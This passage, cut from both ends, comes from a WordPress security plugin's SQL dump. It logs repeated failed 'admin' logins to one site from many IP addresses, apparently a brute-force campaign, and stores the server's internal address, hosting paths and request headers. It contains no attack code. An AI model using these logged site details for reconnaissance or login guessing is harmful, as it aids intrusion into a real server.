00:00:00'),(95307,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49712\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746878274.1963511;s:12:\"REQUEST_TIME\";i:1746878274;}}','103.118.29.120',0,'2025-05-10 17:27:56','1970-01-01 00:00:00'),(95308,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51422\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746878907.6710551;s:12:\"REQUEST_TIME\";i:1746878907;}}','199.188.200.191',0,'2025-05-10 17:38:29','1970-01-01 00:00:00'),(95309,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50200\";s:11:\"REMOTE_ADDR\";s:14:\"68.178.168.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746879541.5475659;s:12:\"REQUEST_TIME\";i:1746879541;}}','68.178.168.103',0,'2025-05-10 17:49:03','1970-01-01 00:00:00'),(95310,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54602\";s:11:\"REMOTE_ADDR\";s:13:\"185.252.31.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746880178.4433701;s:12:\"REQUEST_TIME\";i:1746880178;}}','185.252.31.27',0,'2025-05-10 17:59:40','1970-01-01 00:00:00'),(95311,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42052\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746880820.8083439;s:12:\"REQUEST_TIME\";i:1746880820;}}','162.0.229.109',0,'2025-05-10 18:10:22','1970-01-01 00:00:00'),(95312,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39898\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.145.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746881460.9429741;s:12:\"REQUEST_TIME\";i:1746881460;}}','68.183.145.0',0,'2025-05-10 18:21:02','1970-01-01 00:00:00'),(95313,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41316\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.139.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746882099.4272161;s:12:\"REQUEST_TIME\";i:1746882099;}}','81.177.139.64',0,'2025-05-10 18:31:41','1970-01-01 00:00:00');
INSERT INTO `wp_arm_fail_attempts` VALUES (95314,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35268\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.73.208\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746882734.219712;s:12:\"REQUEST_TIME\";i:1746882734;}}','45.90.73.208',0,'2025-05-10 18:42:15','1970-01-01 00:00:00'),(95315,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49032\";s:11:\"REMOTE_ADDR\";s:12:\"45.89.237.80\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746883372.316376;s:12:\"REQUEST_TIME\";i:1746883372;}}','45.89.237.80',0,'2025-05-10 18:52:54','1970-01-01 00:00:00'),(95316,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47446\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746884009.894839;s:12:\"REQUEST_TIME\";i:1746884009;}}','51.38.119.44',0,'2025-05-10 19:03:31','1970-01-01 00:00:00'),(95317,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57820\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.120.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"